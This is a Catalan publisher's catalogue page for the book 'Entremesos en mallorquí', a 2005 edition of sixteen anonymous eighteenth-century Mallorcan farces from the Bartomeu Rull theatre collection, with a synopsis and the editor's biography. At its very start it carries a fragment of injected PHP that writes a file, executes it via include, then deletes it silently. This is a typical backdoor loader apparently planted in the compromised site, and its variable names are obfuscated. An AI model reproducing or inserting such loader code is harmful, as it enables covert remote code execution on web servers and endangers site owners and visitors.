");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Entremesos en mallorquí
Cercador d'Obres
ORDENAR:
Començar recerca

Entremesos en mallorquí

Ramon Díaz i Villalonga (ed.), Fons Teatral Bartomeu Rull

Prologuista:
Ferran Pujalte
Col·lecció:
Menjavents
Tema:
Teatre
Pàgines:
302
PVP:
20.00
ISBN:
84-96376-41-9
Data d'Edició:
20/07/2005
Sinopsi
Entremesos en mallorquí és un volum manuscrit que fa part del Fons teatral Bartomeu Rull compost per obres de teatre del segle XVIII i començament del XIX. Entre els seus materials més valuosos cal esmentar una obra de teatre del cicle de Pasqua inèdita, una comèdia de teatre hagiogràfic, també inèdita i l’esmentat volum que editam. Es tracta d’un conjunt de setze entremesos, tots ells anònims; un dels seus aspectes més interessants és que s’hi exhumen nou obres de les quals no teníem cap mena de notícia i que, per tant, tenim com a inèdites; són aquests: Entremès del nin, Entremès del mal de queixal, Entremès de Taconer, Entremès d’en Betzola, Entremès de la burla del capell, Entremès ..... Els temes que tracten són els propis d’aquest gènere teatral: l’obstinació absurda, l’engany, la infidelitat, la ignorància, la burla, el casori no correspost, l’embull, l’arrogància del poder, etc. La importància d’aquest llibre radica en dos aspectes: d’una banda donar compte d’un valuós fons de documents teatrals, el Fons teatral de Bartomeu Rull, el contingut i la descripció del qual ocupen els capítols 1, 2 i 3 d’aquest volum. L’altre aspecte important és l’edició dels Entremesos en mallorquí, un conjunt de setze entremesos, tots ells anòmins i nou d’ells inèdits.
Fons Teatral Bartomeu Rull Ramon Díaz i Villalonga (ed.)
Ramon Díaz i Villalonga (Mallorca, 1959) és llicenciat en filologia per la Universitat de les Illes Balears. Treballa com a professor al Departament de Llengua i Literatura Catalanes de l’IES Son Rul·lan de Palma i és professor associat del Departament de Filologia Catalana i Lingüística General de la Universitat de les Illes Balears des del 1996. Ha fet cursos de formació per a professorat de diferents nivells. L’any 1992 es doctorà amb la tesi El teatre hagiogràfic a Mallorca (1702 i 1864). Ha investigat en el camp del teatre, sobretot de l’Edat moderna, amb estudis d’autors i d’obres d’aquest període; ha col·laborat i fa part del consell de redacció del Diccionari del teatre a les Illes Balears. En el camp de la didàctica de la llengua i la literatura és membre del Seminari de Didàcitca del Català de l’Institut de Ciències de l’Educació de la UIB des de la seva fundació l’any 1983, amb el qual ha editat diverses col·leccions de llibres de text (Calidoscopi i Calidoscopi nou) i el projecte Plenamar, que agrupa quatre col·leccions de llibres de didàctica (Mar de sons, Mar de mots, Mar de jocs i Mar de fons); alguns d’aquests materials han merescut els premis Baldiri Rexach (Òmnium Cultural, 1984) i Emili Darder (Obra Cultural Balear, 1992).
Recomanar
Comentar
Comentaris (0)